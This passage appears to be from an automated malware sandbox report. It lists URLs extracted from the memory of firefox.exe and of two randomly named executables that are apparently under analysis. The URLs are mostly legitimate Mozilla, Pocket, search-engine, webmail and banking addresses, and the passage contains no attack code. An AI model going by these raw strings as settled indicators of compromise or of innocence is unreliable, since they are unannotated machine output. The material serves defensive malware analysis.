Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3243620551.000001C23E2D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3242550855.000001C23E2E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=809550
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=815437
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3242550855.000001C23E2FB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=840161
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=951422
Source: 79ddad050f.exe, 00000008.00000003.2979049327.000000000591B000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.2978883446.000000000591E000.00000004.00000800.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000002.3265209742.0000000001328000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3136098458.0000000005966000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3135783451.0000000005969000.00000004.00000800.00020000.00000000.sdmp, DHDHJJJE.9.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 79ddad050f.exe, 00000008.00000003.2979049327.000000000591B000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.2978883446.000000000591E000.00000004.00000800.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000002.3265209742.0000000001328000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3136098458.0000000005966000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3135783451.0000000005969000.00000004.00000800.00020000.00000000.sdmp, DHDHJJJE.9.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 79ddad050f.exe, 00000008.00000003.2979049327.000000000591B000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.2978883446.000000000591E000.00000004.00000800.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000002.3265209742.0000000001328000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3136098458.0000000005966000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3135783451.0000000005969000.00000004.00000800.00020000.00000000.sdmp, DHDHJJJE.9.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-202
Source: 79ddad050f.exe, 00000008.00000003.3071958738.00000000058E1000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3241098493.0000000001039000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3346346381.000001C237BAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3264245114.000001E2D6EC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A53EB000.00000004.00000800.00020000.00000000.sdmp, prefs-1.js.27.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: 79ddad050f.exe, 00000008.00000003.3034902192.00000000058E6000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3241098493.0000000001039000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3346346381.000001C237BAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3264245114.000001E2D6EC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A53EB000.00000004.00000800.00020000.00000000.sdmp, prefs-1.js.27.dr String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3190903073.000001C23EDE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3651042917.000001C23EDE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437483944.000001C23A0C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.3653135084.000001C23FB7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3635856106.000001C23D804000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3263358958.000001E2D6CB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3267971841.00000235A5890000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 0000001B.00000003.3179417311.000001C244753000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3210547179.000001C24474D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crbug.com/993268
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinationsInt
Source: firefox.exe, 0000001B.00000002.3641525579.000001C23DED9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Mozilla/Tech/XPCOM/Reference/Interface/nsIEffectiveTLDServi
Source: firefox.exe, 0000001B.00000003.3179417311.000001C244753000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3210547179.000001C24474D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
Source: firefox.exe, 0000001B.00000003.3179417311.000001C244753000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3210547179.000001C24474D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/for-await...of
Source: firefox.exe, 0000001B.00000003.3179417311.000001C244753000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3210547179.000001C24474D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com
Source: firefox.exe, 0000001B.00000002.3638368743.000001C23DB17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3641525579.000001C23DEF1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3640448626.000001C23DDA5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150637847.000001C23BE3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3282408965.0000016489E04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150450150.000001C23BE1D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150800700.000001C23BE60000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150956567.000001C23BE81000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3619069627.000001C23C690000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150183043.000001C23C300000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: 79ddad050f.exe, 00000008.00000003.2979049327.000000000591B000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.2978883446.000000000591E000.00000004.00000800.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000002.3265209742.0000000001328000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3136098458.0000000005966000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3135783451.0000000005969000.00000004.00000800.00020000.00000000.sdmp, DHDHJJJE.9.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 79ddad050f.exe, 00000008.00000003.2979049327.000000000591B000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.2978883446.000000000591E000.00000004.00000800.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000002.3265209742.0000000001328000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3136098458.0000000005966000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3135783451.0000000005969000.00000004.00000800.00020000.00000000.sdmp, DHDHJJJE.9.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 79ddad050f.exe, 00000008.00000003.2979049327.000000000591B000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.2978883446.000000000591E000.00000004.00000800.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000002.3265209742.0000000001328000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3136098458.0000000005966000.00000004.00000800.00020000.00000000.sdmp, 79ddad050f.exe, 0000000A.00000003.3135783451.0000000005969000.00000004.00000800.00020000.00000000.sdmp, DHDHJJJE.9.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3619069627.000001C23C690000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/y
Source: firefox.exe, 0000001B.00000003.3247118953.000001C23C2DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3609614943.000001C23C173000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B4C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3610402766.000001C23C2DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3155911537.000001C23C2DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001B.00000002.3609614943.000001C23C173000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B4C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3187826061.000001C23F123000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A5312000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/673d2808-e5d8-41b9-957
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3181465524.000001C244A29000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3193714201.000001C244A82000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/d8e772fe-4909-4f05-9f9
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/f0f51715-7f5e-48de-839
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238527000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1BrowserInitState.startupIdleTaskPromise
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B4E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351019948.000001C2384D9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 0000001B.00000002.3624313828.000001C23CBC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com/
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3187826061.000001C23F123000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A5312000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3187826061.000001C23F162000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3652245578.000001C23F162000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C2385E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A53C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3187826061.000001C23F162000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3652245578.000001C23F162000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C2385E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A53C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3438395331.000001C23B663000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C2385E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238548000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A532F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3187826061.000001C23F162000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3652245578.000001C23F162000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C2385E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A53C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 0000001B.00000002.3482921182.000001C23B90F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabL
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabListens
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_moreextensions.pocket.oAuthConsumerKey
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_morehome-prefs-highlights-option-saved-to-pocket
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3187826061.000001C23F162000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3652245578.000001C23F162000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C2385E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A53C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 0000001B.00000002.3482921182.000001C23B90F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS
Source: firefox.exe, 0000001B.00000002.3482921182.000001C23B90F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS7
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsStructured
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3482921182.000001C23B90F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
Source: firefox.exe, 0000001B.00000003.3179417311.000001C244753000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3210547179.000001C24474D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/google/closure-compiler/issues/3177
Source: firefox.exe, 0000001B.00000003.3179417311.000001C244753000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3210547179.000001C24474D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/issues/1266
Source: firefox.exe, 0000001B.00000003.3179417311.000001C244753000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3210547179.000001C24474D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/microsoft/TypeScript/issues/338).
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150637847.000001C23BE3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3351773313.000001C238573000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150450150.000001C23BE1D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150800700.000001C23BE60000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3619069627.000001C23C690000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000003.3150183043.000001C23C300000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla/webcompat-reporter
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3482921182.000001C23B981000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3482921182.000001C23B981000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238527000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/zertosh/loose-envify)
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gpuweb.github.io/gpuweb/#getLanguageIdModelArrayBuffer
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3286911695.000001C22C311000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe, 0000001B.00000002.3351773313.000001C238503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881See
Source: firefox.exe, 0000001B.00000003.3245523284.000001C23E294000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3646061223.000001C23E603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3232307080.000001C23E294000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3640448626.000001C23DD7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3626934066.000001C23CE19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ib.absa.co.za/
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3640448626.000001C23DD3A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://identity.mozilla.com/apps/relay
Source: firefox.exe, 0000001B.00000002.3631873065.000001C23D017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/
Source: firefox.exe, 0000001B.00000002.3437961664.000001C23B491000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3437961664.000001C23B42D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3346346381.000001C237BAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3264245114.000001E2D6EC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3261027075.00000235A53EB000.00000004.00000800.00020000.00000000.sdmp, prefs-1.js.27.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
